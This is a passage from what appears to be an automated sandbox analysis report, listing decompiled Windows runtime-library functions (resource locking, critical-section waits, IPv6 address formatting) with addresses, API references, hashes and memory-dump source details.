                                0x00a922a7
                                0x00a922a9
                                0x00000000
                                0x00000000
                                0x00a922ab
                                0x00a922ad
                                0x00a922af
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00a922af
                                0x00a922b1
                                0x00a922b4
                                0x00a922b4
                                0x00a922b6
                                0x00a553be
                                0x00a553be
                                0x00a553be
                                0x00a553c0
                                0x00000000
                                0x00000000
                                0x00a553cb
                                0x00a553ce
                                0x00a553d0
                                0x00a553d4
                                0x00a553d6
                                0x00000000
                                0x00a553d8
                                0x00a553e3
                                0x00a553ea
                                0x00a553ea
                                0x00000000
                                0x00a553d6
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00a922b6
                                0x00000000
                                0x00a9228f
                                0x00a92349
                                0x00a9234d
                                0x00a92251
                                0x00a92251
                                0x00000000
                                0x00a92251
                                0x00a921a4
                                0x00a921a4
                                0x00a921a6
                                0x00a921a8
                                0x00a921ac
                                0x00a921b6
                                0x00a921b8
                                0x00a921bc
                                0x00a921be
                                0x00000000
                                0x00000000
                                0x00a921c0
                                0x00a921c2
                                0x00a921c4
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00a921c4
                                0x00a921c6
                                0x00a921c6
                                0x00a921c8
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00a921c8
                                0x00a921a2
                                0x00000000
                                0x00a92183
                                0x00a7057b
                                0x00a7057d
                                0x00a70581
                                0x00a70583
                                0x00a92178
                                0x00000000
                                0x00a70589
                                0x00a7058f
                                0x00a7058f
                                0x00a70583
                                0x00000000

                                APIs
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A92206
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                • API String ID: 885266447-4236105082
                                • Opcode ID: 94778b5b8187e08b74182e06d28001f2f816855830433bd5667ba670fab7bf80
                                • Instruction ID: 6cb4496eeb64cdab9d1a2162025098d85157bd5944a1d5ce6f6b8789a53cf350
                                • Opcode Fuzzy Hash: 94778b5b8187e08b74182e06d28001f2f816855830433bd5667ba670fab7bf80
                                • Instruction Fuzzy Hash: F3510876B002117FEF14DB18DC81FA673E9AB98720F218269FD59DF286DA71EC418790
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A714C0, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 91COMMON
                                Download Yara Rule
                                C-Code - Quality: 64%
                                			E00A714C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0xb12088; // 0x77412276
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00A67707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E00A713CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00A67707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00A67707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00A32340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E00A3E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                0x00a714c0
                                0x00a714cb
                                0x00a714d2
                                0x00a714d6
                                0x00a714da
                                0x00a714de
                                0x00a714e3
                                0x00a7157a
                                0x00a7157a
                                0x00a714f1
                                0x00a714f3
                                0x00a9ea0f
                                0x00000000
                                0x00a9ea15
                                0x00000000
                                0x00a9ea15
                                0x00a714f9
                                0x00a714f9
                                0x00a714fe
                                0x00a71504
                                0x00a9ea1a
                                0x00a9ea1f
                                0x00a9ea21
                                0x00a9ea22
                                0x00a9ea27
                                0x00a9ea2a
                                0x00a9ea2a
                                0x00a71515
                                0x00a71517
                                0x00a7156d
                                0x00a71572
                                0x00a71575
                                0x00a71575
                                0x00a7151e
                                0x00a9ea50
                                0x00a9ea55
                                0x00a9ea58
                                0x00a9ea58
                                0x00a7152e
                                0x00a71531
                                0x00a71533
                                0x00000000
                                0x00a71535
                                0x00a71541
                                0x00a71549
                                0x00a71549
                                0x00a71533
                                0x00a714f3
                                0x00a71559

                                APIs
                                • ___swprintf_l.LIBCMT ref: 00A9EA22
                                  • Part of subcall function 00A713CB: ___swprintf_l.LIBCMT ref: 00A7146B
                                  • Part of subcall function 00A713CB: ___swprintf_l.LIBCMT ref: 00A71490
                                • ___swprintf_l.LIBCMT ref: 00A7156D
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ___swprintf_l
                                • String ID: %%%u$]:%u$v"Aw
                                • API String ID: 48624451-1222212459
                                • Opcode ID: 145405dce3c838e0af53aec68c7f3f922fa62bff9c0477700d4031cb458e1293
                                • Instruction ID: 5d4ccea50526b99de4728643a89cd35aa56d5ef602ec7a77af08dc71b3cb94f6
                                • Opcode Fuzzy Hash: 145405dce3c838e0af53aec68c7f3f922fa62bff9c0477700d4031cb458e1293
                                • Instruction Fuzzy Hash: 31218EB2900219ABCF20DF68CD41AEE73FCAB50704F54C555F84A93141DB70AA588BE1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00AD3DA7, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 82COMMON
                                Download Yara Rule
                                C-Code - Quality: 62%
                                			E00AD3DA7(void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v11;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t17;
				void* _t19;
				void* _t29;
				void* _t32;
				void* _t33;
				intOrPtr _t34;
				void* _t39;
				intOrPtr* _t40;
				void* _t42;
				signed int _t44;
				void* _t45;

				_t39 = __edx;
				_t17 =  *0xb12088; // 0x77412276
				_v8 = _t17 ^ _t44;
				_t34 = _a16;
				_t41 = _a4;
				_t40 = _a20;
				if(_a4 == 0 || _t40 == 0 || _t34 == 0 &&  *_t40 != _t34) {
					L12:
					_t19 = 0xc000000d;
				} else {
					_t21 =  &_v76;
					if(_a12 != 0) {
						_push(0xa39cbe);
						_push(0x41);
						_push( &_v76);
						_t33 = E00AE894A();
						_t45 = _t45 + 0xc;
						_t21 = _t44 + _t33 - 0x48;
					}
					_t42 = E00AD3B8E(_t41, _t21);
					if(_a8 != 0) {
						_t32 = E00AE894A(_t42,  &_v11 - _t42, "%%%u", _a8);
						_t45 = _t45 + 0x10;
						_t42 = _t42 + _t32;
					}
					if(_a12 != 0) {
						_t29 = E00AE894A(_t42,  &_v11 - _t42, "]:%u", _a12 & 0x0000ffff);
						_t45 = _t45 + 0x10;
						_t42 = _t42 + _t29;
					}
					_t41 = _t42 -  &_v76 + 1;
					 *_t40 = _t41;
					if( *_t40 < _t41) {
						goto L12;
					} else {
						E00A32340(_t34,  &_v76, _t41);
						_t19 = 0;
					}
				}
				return E00A3E1B4(_t19, _t34, _v8 ^ _t44, _t39, _t40, _t41);
			}




















                                0x00ad3da7
                                0x00ad3daf
                                0x00ad3db6
                                0x00ad3dba
                                0x00ad3dbe
                                0x00ad3dc2
                                0x00ad3dc7
                                0x00ad3e6b
                                0x00ad3e6b
                                0x00ad3de1
                                0x00ad3de6
                                0x00ad3de9
                                0x00ad3deb
                                0x00ad3df0
                                0x00ad3df2
                                0x00ad3df3
                                0x00ad3df8
                                0x00ad3dfb
                                0x00ad3dfb
                                0x00ad3e0a
                                0x00ad3e0c
                                0x00ad3e1d
                                0x00ad3e22
                                0x00ad3e25
                                0x00ad3e25
                                0x00ad3e2c
                                0x00ad3e46
                                0x00ad3e4b
                                0x00ad3e4e
                                0x00ad3e4e
                                0x00ad3e55
                                0x00ad3e58
                                0x00ad3e5a
                                0x00000000
                                0x00ad3e5c
                                0x00ad3e5f
                                0x00ad3e67
                                0x00ad3e67
                                0x00ad3e5a
                                0x00ad3e7e

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ___swprintf_l
                                • String ID: %%%u$]:%u$v"Aw
                                • API String ID: 48624451-1222212459
                                • Opcode ID: a8861c07e0188d7509d78226f00b964fc26fc9032cff4c82c3db3b5dc9da2ba0
                                • Instruction ID: 4284fa87a4a4de79c471cec593eead1ca47512452424f79accf370bcb887b497
                                • Opcode Fuzzy Hash: a8861c07e0188d7509d78226f00b964fc26fc9032cff4c82c3db3b5dc9da2ba0
                                • Instruction Fuzzy Hash: 5221907390022AABCF10AF668D459EF77ADAB14714F040926FC1997281EBB49A4487E2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A553A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                Download Yara Rule
                                C-Code - Quality: 45%
                                			E00A553A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00b101c0;
									_push(_t92);
									_push(0);
									_t37 = E00A2F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E00A74FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E00A83F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E00A83F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E00AB217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00A83F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E00A73915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00A55384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E00A2F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E00A73915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E00A2F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E00A73915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E00A2F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E00A73915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E00A55329(_t74, _t92);
													_push(1);
													_t48 = E00A553A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                0x00a553ab
                                0x00a553ae
                                0x00a553b1
                                0x00a553b4
                                0x00a553b7
                                0x00a705b6
                                0x00a705c0
                                0x00a705c3
                                0x00000000
                                0x00a705c9
                                0x00a705c9
                                0x00a705cc
                                0x00a705d5
                                0x00a705d5
                                0x00a553bd
                                0x00a553bd
                                0x00a553bd
                                0x00a553be
                                0x00a553be
                                0x00a553be
                                0x00a553c0
                                0x00000000
                                0x00000000
                                0x00a92269
                                0x00a9226d
                                0x00a92349
                                0x00a9234d
                                0x00a92273
                                0x00a92276
                                0x00a92279
                                0x00a9227e
                                0x00a92283
                                0x00a92287
                                0x00a9228a
                                0x00a9228d
                                0x00a9228f
                                0x00a922bc
                                0x00a922bc
                                0x00a922bc
                                0x00a922be
                                0x00a922c4
                                0x00a922cc
                                0x00a922d0
                                0x00a922d6
                                0x00a922d7
                                0x00a922da
                                0x00a922df
                                0x00a922e4
                                0x00000000
                                0x00000000
                                0x00a922e6
                                0x00a922e9
                                0x00a922f4
                                0x00a922f9
                                0x00a922fa
                                0x00a92305
                                0x00a92314
                                0x00a92319
                                0x00a9231a
                                0x00a9231d
                                0x00a92320
                                0x00a92323
                                0x00a92323
                                0x00a92328
                                0x00a9232d
                                0x00a9232f
                                0x00a92331
                                0x00a92336
                                0x00a92336
                                0x00a9233b
                                0x00a9233d
                                0x00a92350
                                0x00a92351
                                0x00a92356
                                0x00a92359
                                0x00a92359
                                0x00a9235b
                                0x00a9235d
                                0x00a55367
                                0x00a5536b
                                0x00a55372
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00a92363
                                0x00a92363
                                0x00a92369
                                0x00a9236a
                                0x00a9236c
                                0x00a92371
                                0x00a92373
                                0x00000000
                                0x00a92379
                                0x00a92379
                                0x00a9237a
                                0x00a9237f
                                0x00a9237f
                                0x00a92385
                                0x00a92386
                                0x00a92389
                                0x00a9238e
                                0x00a92390
                                0x00a55378
                                0x00a5537c
                                0x00a92396
                                0x00a92396
                                0x00a92397
                                0x00a9239c
                                0x00a923a2
                                0x00a923a3
                                0x00a923a6
                                0x00a923ab
                                0x00a923ad
                                0x00000000
                                0x00a923b3
                                0x00a923b3
                                0x00a923b4
                                0x00a923b9
                                0x00a923ba
                                0x00a923ba
                                0x00a923bc
                                0x00a923bf
                                0x00000000
                                0x00000000
                                0x00a89153
                                0x00a89158
                                0x00a8915a
                                0x00a8915e
                                0x00a89160
                                0x00000000
                                0x00a89166
                                0x00a89166
                                0x00a89171
                                0x00a89176
                                0x00a89176
                                0x00000000
                                0x00a89160
                                0x00a923c6
                                0x00a923cb
                                0x00a923ce
                                0x00a923d7
                                0x00a923d7
                                0x00a923ad
                                0x00a92390
                                0x00a92373
                                0x00a9233f
                                0x00a9233f
                                0x00000000
                                0x00a9233f
                                0x00a92291
                                0x00a92291
                                0x00a92293
                                0x00a92295
                                0x00a9229a
                                0x00a922a1
                                0x00a922a3
                                0x00a922a7
                                0x00a922a9
                                0x00000000
                                0x00000000
                                0x00a922ab
                                0x00a922ad
                                0x00a922af
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00a922af
                                0x00a922b1
                                0x00a922b4
                                0x00a922b4
                                0x00a922b6
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00a922b6
                                0x00a9228f
                                0x00000000
                                0x00a9226d
                                0x00a553cb
                                0x00a553ce
                                0x00a553d0
                                0x00a553d4
                                0x00a553d6
                                0x00000000
                                0x00a553d8
                                0x00a553e3
                                0x00a553ea
                                0x00a553ea
                                0x00a553d6
                                0x00000000

                                APIs
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A922F4
                                Strings
                                • RTL: Resource at %p, xrefs: 00A9230B
                                • RTL: Re-Waiting, xrefs: 00A92328
                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00A922FC
                                Memory Dump Source
                                • Source File: 00000007.00000002.2279175363.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true
                                • Associated: 00000007.00000002.2279170485.0000000000A10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279267315.0000000000B00000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279274210.0000000000B10000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279284137.0000000000B14000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279293748.0000000000B17000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279302550.0000000000B20000.00000040.00000001.sdmp Download File
                                • Associated: 00000007.00000002.2279338013.0000000000B80000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                • API String ID: 885266447-871070163
                                • Opcode ID: ad2bf611962694bb78ea866cbb8e3413c909ecb36b07ea0055a15ca4eccae4e7
                                • Instruction ID: d22e4482ef95fd9dfbc36e2963cf01248b6c11e25a252f9c94df189863593ae0
                                • Opcode Fuzzy Hash: ad2bf611962694bb78ea866cbb8e3413c909ecb36b07ea0055a15ca4eccae4e7
                                • Instruction Fuzzy Hash: 0851E372B006017ADF119B38DD91FA673E8AF58760F114229FE09DF281EA71ED4587A0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00A5EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                Download Yara Rule
                                C-Code - Quality: 51%
                                			E00A5EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E00A4DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0xb1793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E00A316C0(_t39);
				} else {
					_t40 = E00A2F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E00A73915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E00A301A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0xb1793c; // 0x0
								_push(_t85);
								_t44 = E00A31F28(_t71);
							} else {
								_t44 = E00A2F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E00A73915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E00AB2306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E00A5EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E00A74FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E00A83F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E00A83F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0xb120c0;
								if(_t85 != 0xb120c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E00AB217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E00A83F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                0x00a5ec56
                                0x00a5ec56
                                0x00a5ec56
                                0x00a5ec5c
                                0x00a5ec64
                                0x00a923e6
                                0x00a923eb
                                0x00a923eb
                                0x00a5ec6a
                                0x00a5ec6c
                                0x00a5ec6f
                                0x00a923f3
                                0x00a923f8
                                0x00a923fa
                                0x00a923fc
                                0x00a5ec75
                                0x00a5ec76
                                0x00a5ec76
                                0x00a5ec7b
                                0x00a5ec7c
                                0x00a5ec7e
                                0x00a92406
                                0x00a92407
                                0x00a9240c
                                0x00a9240d
                                0x00a9240d
                                0x00a9240d
                                0x00a92414
                                0x00a92417
                                0x00a9241e
                                0x00a92435
                                0x00a92438
                                0x00a9243c
                                0x00a9243f
                                0x00a92442
                                0x00a92443
                                0x00a92446
                                0x00a92449
                                0x00a92453
                                0x00a92455
                                0x00a9245b
                                0x00a9245b
                                0x00a5eb99
                                0x00a5eb99
                                0x00a5eb9c
                                0x00a5eb9d
                                0x00a5eb9f
                                0x00a5eba2
                                0x00a92465
                                0x00a9246b
                                0x00a9246d
                                0x00a5eba8
                                0x00a5eba9
                                0x00a5eba9
                                0x00a5ebae
                                0x00a5ebb3
                                0x00a5ebb9
                                0x00a5ebbb
                                0x00a92513
                                0x00a92514
                                0x00a92519
                                0x00a9251b
                                0x00a5ec2a
                                0x00a5ec2d
                                0x00a5ec33
                                0x00a5ec36
                                0x00a5ec3a
                                0x00a5ec3e
                                0x00a5ec40
                                0x00a5ec47
                                0x00a5ec47
                                0x00a5ec40
                                0x00a322c6
                                0x00a5ebc1
                                0x00a5ebc1
                                0x00a5ebc5
                                0x00a5ec9a
                                0x00a5ec9a
                                0x00a5ebd6
                                0x00a5ebd6
                                0x00000000
